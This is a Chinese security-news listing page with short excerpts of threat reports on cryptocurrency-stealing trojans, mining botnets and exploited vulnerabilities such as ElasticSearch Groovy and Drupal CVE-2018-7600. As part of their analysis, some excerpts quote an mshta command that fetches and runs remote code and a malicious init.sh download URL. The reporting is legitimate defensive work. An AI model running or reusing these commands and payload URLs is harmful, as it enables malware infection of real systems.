记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

区块链火了Sality病毒,感染3万电脑伺机盗取比特币

一、背景腾讯安全御见威胁情报中心检测到Sality感染型病毒活跃,该病毒同时传播“剪切板大盗”木马盗取数字加密货币。在国家大力发展区块链相关产业的大背景下,各种数字加密币的交易空前活跃,以比特币为首的各种数字加密币趁势爆涨。Sality病毒利用自己建立的P2P网络,传播以盗取、劫持虚拟币交易为目的的剪切板大盗木马,将会对虚拟币交易安全构成严重威胁。Sality病毒最早于2003年被发现,最初只是一个简单的文件感染程序,具有后门和按键记录功能。Sality后来增加了组建P2P分布式网络的功能,在增强了传播速度的同时也具有了更大的破坏能力。Sality病毒拥有一个内置的URL列表,同时可以从其他受感染的P2P网络中接收新的
发布时间:2019-10-30 13:10 | 阅读:14157 | 评论:0 | 标签:加密货币 Sality病毒

窃取加密货币的新型木马:InnfiRAT

背景近日,国外安全研究人员曝光了一种名为InnfiRAT的新型木马,该木马使用.NET编写,具有窃取用户信息、抓取浏览器Cookie用于窃取密码、屏幕截取、下载执行其他恶意文件等行为。除此之外,该木马还会查找主机上的加密货币钱包信息,用于窃取加密货币(莱特币和比特币)。功能分析木马进程首先检测自身路径是否为%AppData%NvidiaDriver.exe,并且终止名为NvidiaDriver.exe的进程,将自身复制到%AppData%NvidiaDriver.exe再次执行:以NvidiaDriver.exe重新运行后,会拼接一段base64编码的数据,解码后是一个PE文件,加载到内存中执行:获取主机信息,检查Ma
发布时间:2019-09-19 13:10 | 阅读:15521 | 评论:0 | 标签:加密货币 InnfiRAT 加密

后起之秀:Gorgon APT黑客组织觊觎虚拟货币钱包

背景Gorgon APT组织是一个被认为来自巴基斯坦的攻击组织,该组织在2018年8月份由Palo Alto Unit42团队进行披露,主要针对全球外贸人士进行攻击。除此之外,安全研究人员还发现Gorgon针对英国、西班牙、俄罗斯、美国等政府目标发起了攻击,算是APT组织的后起之秀,最近一年非常活跃。近日,深信服安全团队发现了Gorgon APT组织最新变种样本,此样本释放了一个盗取受害者虚拟币钱包的木马。/攻击流程图/样本分析1.样本中包含恶意的宏代码,如下所示:2.通过动态调试,宏代码调用mshta.exe执行mshta http://bitly.com/6xdfsSXsh6,访问短链接网址http://bitly
发布时间:2019-09-18 13:10 | 阅读:16802 | 评论:0 | 标签:加密货币 虚拟货币钱包

NSA泄露工具被用来传播加密货币挖矿机

普通网络犯罪和针对性攻击的区别在于:普通网络犯罪会将即时的经济目标作为主要动机,而针对性攻击可能还会有其他的目标,比如窃取知识产权。此外,攻击者的思维模式也是不同的。正常的网络犯罪分子需要考虑如何入侵更多的个人设备,而针对性攻击需要计划如何入侵和获取企业网络的访问权限,并尽可能地隐蔽。除此之外,针对性攻击活动常常包括扩展性的计划以及高度专业化的创建和使用。另一方面,正常的攻击者可能没有能力或资源来规划复杂的攻击活动,他们使用的工具更加通用,而且一般地下市场都有。近期,研究人员发现了一起融合了针对性攻击工具和常规网络犯罪的大规模攻击活动:攻击者使用了之前在针对性攻击中使用的复杂攻击来传播加密货币挖矿机和勒索软件这样的典型
发布时间:2019-07-24 12:25 | 阅读:71396 | 评论:0 | 标签:系统安全 加密货币 加密

17年的XHide被用于传播shellbot和XMRig

Trend Micro蜜罐系统检测到扫描开放端口、暴力破解弱凭证、安装门罗币加密货币挖矿和基于Perl的IRC后门作为final payload。挖坑过程使用XHide Process Faker来进行隐藏,这是一个有17年历史的开源工具用来伪造进程名。研究人员分析发现攻击者通过发布命令到有漏洞的机器来下载和安装后门和挖矿机。安装的后门为Shellbot,可以扫描开放端口、下载文件、执行UDP洪泛攻击,并且可以远程执行shell命令。用2个payload来感染设备盈利可能性更高,因此恶意攻击者可以用shellbot和挖矿机来进行获利。受影响到区域包括日本、巴西、中国、土耳其等。Routine恶意软件会扫描开放端口和弱凭
发布时间:2019-07-23 12:25 | 阅读:29529 | 评论:0 | 标签:加密货币 加密货币挖矿

2019上半年恶意挖矿趋势报告

上一期,深信服安全团队对勒索病毒进行2019半年度总结,主要盘点了高发勒索家族、受灾区域分布、勒索病毒发展走向等。本期深信服安全团队对另一流行病毒类型——挖矿木马进行深入分析,给大家揭秘2019上半年挖矿木马的所作所为。一、2019上半年恶意挖矿数据统计近来加密货币价格走势如过山车般跌宕起伏,截至6月比特币成功翻身,价格重返五位数,几人欢喜几人悲伤,这其中最欢喜莫过于恶意挖矿黑产从业者,由于其隐匿性、低成本、无中间商赚差价,导致挖矿木马是近年来最流行的病毒类型之一,而企业的服务器则成为黑产眼中的盛宴。1.1恶意挖矿活跃度呈增长趋势据深信服安全云脑统计,2019上半年里挖矿木马拦截数达到54亿次,整体呈增长的趋势,三月份
发布时间:2019-07-16 12:25 | 阅读:38240 | 评论:0 | 标签:加密货币

Burimi挖矿蠕虫攻击超3300万个邮箱,发送欺诈邮件勒索比特币

简介腾讯安全御见威胁情报中心捕获到一例挖矿蠕虫病毒攻击事件,黑客通过VNC爆破服务器弱口令,得手后先下载门罗币挖矿木马,同时在被感染的电脑上分别验证超过3300万个邮箱帐号密码,若验证成功就向该邮箱发送欺诈勒索邮件。邮件中威胁:“你已经感染了我的私人木马,我知道你的所有密码和隐私信息(包括隐私视频),唯一让我停下来的方式就是三天内向我支付价值900美元的比特币。”我们根据病毒的验证任务系统推测已知受害邮箱帐户超过3300万个,包括Yahoo、Google、AOL、微软在内的邮件服务均在被攻击之列。由于主模块编写者为“Burimi”,且具有内网传播能力,腾讯安全专家将其命名为“Burimi”挖矿蠕虫。详细分析:木马启动后
发布时间:2019-07-09 17:25 | 阅读:48901 | 评论:0 | 标签:加密货币 Burimi

利用ADB和SSH传播的新型加密货币挖矿僵尸网络现身

趋势科技在最近的研究中发现一种新的加密货币挖矿僵尸网络,它可以通过开放的ADB(Android Debug Bridge)端口进入,并借助SSH传播扩散。这种攻击方法利用了默认情况下打开的ADB端口没有身份验证的设置,类似于之前报告的Satori僵尸网络变体。这个僵尸网络的设计能够让它从受感染的主机传播到任何先前与主机建立SSH连接的系统。利用ADB的做法使得基于Android的设备很容易受攻击。趋势科技在21个不同国家/地区检测到该僵尸网络的活动,在韩国发现的比例最高。技术细节已经发现IP地址45 [.] 67 [.] 14 [.] 179连接到ADB运行设备或系统,然后进行多项活动。图1总结了攻击的感染链。图1.攻
发布时间:2019-06-30 12:25 | 阅读:58628 | 评论:0 | 标签:加密货币 僵尸网络 加密

安天蜜网捕获“利用ElasticSearch Groovy漏洞进行门罗币(Dog)挖矿”事件分析

1、概述2019年6月13日,安天蜜网捕获到利用CVE-2015-1427(ElasticSearch Groovy)远程命令执行漏洞的攻击行为。该漏洞原理是Elaticsearch将groovy作为脚本语言,并使用基于黑白名单的沙盒机制限制危险代码执行,但该机制不够严格,可以被绕过,从而导致出现远程代码执行的情况。安天对此次事件进行了详细的样本分析,并给出预防及修复建议。2 、样本分析2.1 关键攻击载荷从攻击载荷来看,攻击者通过groovy作为脚本语言,向_search?pretty页面发送一段带有恶意链接为http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh的jso
发布时间:2019-06-26 12:25 | 阅读:65484 | 评论:0 | 标签:加密货币 门罗币 漏洞

一次基于GAO报告的暗网追踪比特币枪支销售的OSINT调查

介绍去年11月,GAO (美国美国政府责任署管理局)和 ATF (美国烟酒枪支及爆炸物管理局)发布了关于互联网枪支销售的报告。 调查包括试图在 Surface Web 和 Dark Web 上购买武器的报道。 7次尝试中的2次都成功了。 基于不同的 OSINT 技术,我试图找到哪些市场代理商购买了枪支,如果可能的话我会继续跟踪交易。 剧透警告——我认为这是不可能的。图片由Jens Lelie 发布于 Unsplash我真的很鼓励你阅读整个报告,我在阅读中学到了很多有趣的东西。https://www.gao.gov/assets/690/688535.pdfhttps://www.gao.gov/product
发布时间:2019-06-19 12:25 | 阅读:79864 | 评论:0 | 标签:加密货币 技术 GAO OSINT 比特币

Pacha和Rocke组织竞争云端资源进行加密货币挖矿

Pacha组织是Intezer研究人员2019年2月发现的一个加密货币挖矿威胁单元,该组织主要攻击Linux服务器,并且应用了多种高级绕过和驻留技术。研究人员持续监控该组织攻击活动发现Pacha组织也在攻击云环境并尝试破坏和干扰其他加密货币挖矿组织,其中包括攻击云环境的Rocke组织。研究人员认为云环境未来将成为更多攻击者的目标。技术分析在监控Pacha组织时,研究人员发现于之前变种共享代码的新的Linux.GreedyAntd变种样本。虽然与之前变种共享了接近30%的代码量,但Pacha组织新变种的检测率仍然很低——1/60。主要的恶意软件基础设施与之前pacha组织攻击活动所使用的相同。Roche组织是Cisco
发布时间:2019-06-01 12:25 | 阅读:62212 | 评论:0 | 标签:加密货币 加密货币挖矿 加密

NSAMsdMiner利用永恒之蓝攻击企业内网,窃取机密挖矿牟利双管齐下

概述近期腾讯安全御见威胁情报中心捕获到新的挖矿木马家族,该木马使用NSA武器的永恒之蓝、永恒浪漫、永恒冠军、双脉冲星4个工具进行攻击传播。攻击者可完全控制中毒电脑,窃取企业机密信息,并利用中毒电脑资源运行门罗币挖矿程序,该病毒还同时具有劫持其他挖矿木马工作成果的能力。腾讯电脑管家、腾讯御点终端安全管理系统均可查杀该病毒。攻击者利用漏洞攻陷目标机器后,playload从位于某云服务器下载Windowsd.exe(攻击模块)、work.exe(远程控制模块)、mm.exe(门罗币挖矿模块,32位系统下载的是XMR-NOSSL-x86.exe)到C:programdata目录下,以子进程方式运行。由于此次的木马特点为使用NS
发布时间:2019-05-30 12:25 | 阅读:58483 | 评论:0 | 标签:加密货币 永恒之蓝

Razy恶意软件攻击浏览器扩展,窃取加密货币

Kaspersky研究人员在2018年发现一个在受害者计算机中安装恶意浏览器扩展或感染已安装的扩展的恶意软件。恶意软件可以关闭已安装的扩展的完整性检查,并为目标浏览器自动更新。Kaspersky安全产品检测到该恶意软件为Razy,通过恶意广告拦截模块进行传播,并伪装成合法软件在免费文件主机服务上进行分发。Razy的目的有很多,主要是与窃取加密货币相关。其主要工具是main.js脚本,可以:· 搜索网站上的加密货币钱包的地址,并将其替换为攻击者的钱包地址;· 伪造指向钱包的二维码图片;· 修改加密货币交易页面;· 欺骗Google和Yandex搜索结构。感染Razy木马工作在Google C
发布时间:2019-01-31 12:20 | 阅读:122488 | 评论:0 | 标签:Web安全 加密货币 加密

看!研究人员演示如何攻破加密货币硬件钱包的安全防线

最近,一组安全研究人员为我们展示了某些加密货币硬件钱包的安全性是何等的脆弱。其中,这些专家针对Trezor One、Ledger Nano S和Ledger Blue进行了供应链攻击和侧信道攻击方面的安全测试,发现其中存在芯片和固件级的安全漏洞。实际上,这项研究工作是Dmitry Nedospasov、Thomas Roth和AD Josh Datko于今年6月着手进行的,最终,他们找到了多种可以突破目标加密货币钱包的安全防线的攻击方法。上周四,他们在Chaos Communication Congress大会上,展示了相关的攻击手法,例如在这些设备到达最终用户手中之前对其进行篡改,或直接用“赝品”替换它们。真的是原包
发布时间:2019-01-04 17:21 | 阅读:91744 | 评论:0 | 标签:漏洞 加密货币 加密

2018加密货币安全大事记

从加密货币交易遭黑客攻击的次数,到被盗资产的数量,再到有史以来最大的一次交易遭黑客攻击,加密技术创造了许多记录。2018加密货币垃圾邮件、网络攻击等事件层出不穷,下面分月列出相关事件。1月· BlackWallet.co是一款基于Web的Stellar Lumen币(XLM)钱包应用。一个或多个未知的黑客攻击BlackWallet并劫持了其DNS服务器,并其用户账户中窃取了超过40万美金。· 开发商 Arnau 发布了一个名为 CoffeeMiner 的PoC项目,证明攻击者可以在未经用户同一的情况下利用连接到公共 Wi-Fi 网络的设备进行加密货币挖矿活动。· 日本最大的加密货币交易所C
发布时间:2019-01-03 12:20 | 阅读:88568 | 评论:0 | 标签:观察 加密货币 加密

利用Drupal远程代码执行漏洞(CVE-2018-7600)挖矿技术分析

阅读: 51Drupal站点再一次被利用,这次是为了挖掘加密货币。据安全公司Imperva Incapsula的研究人员称,这个被称为“Kitty”加密货币挖矿恶意软件的恶意脚本利用Drupal中已知的严重远程代码执行漏洞(CVE-2018-7600)不仅针对服务器,还针对浏览器。相关阅读:【漏洞分析】CVE-2018-7600 Drupal 7.x 版本代码执行【漏洞分析】Drupal远程代码执行漏洞(CVE-2018-7600)分析攻击原理在服务器上,攻击者安装一个挖矿程序 – “kkworker” – 挖掘xmrig(XMR)Monero加密货币。但攻击者也正在寻找使用名为me0w.js的挖掘脚本来扩展他们对web应用程序访问者的挖掘工作。他们通过将恶意JavasSript(me0
发布时间:2018-05-09 15:05 | 阅读:168734 | 评论:0 | 标签:安全分享 CVE-2018-7600 drupal漏洞 加密货币 加密货币挖矿 挖矿 漏洞

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云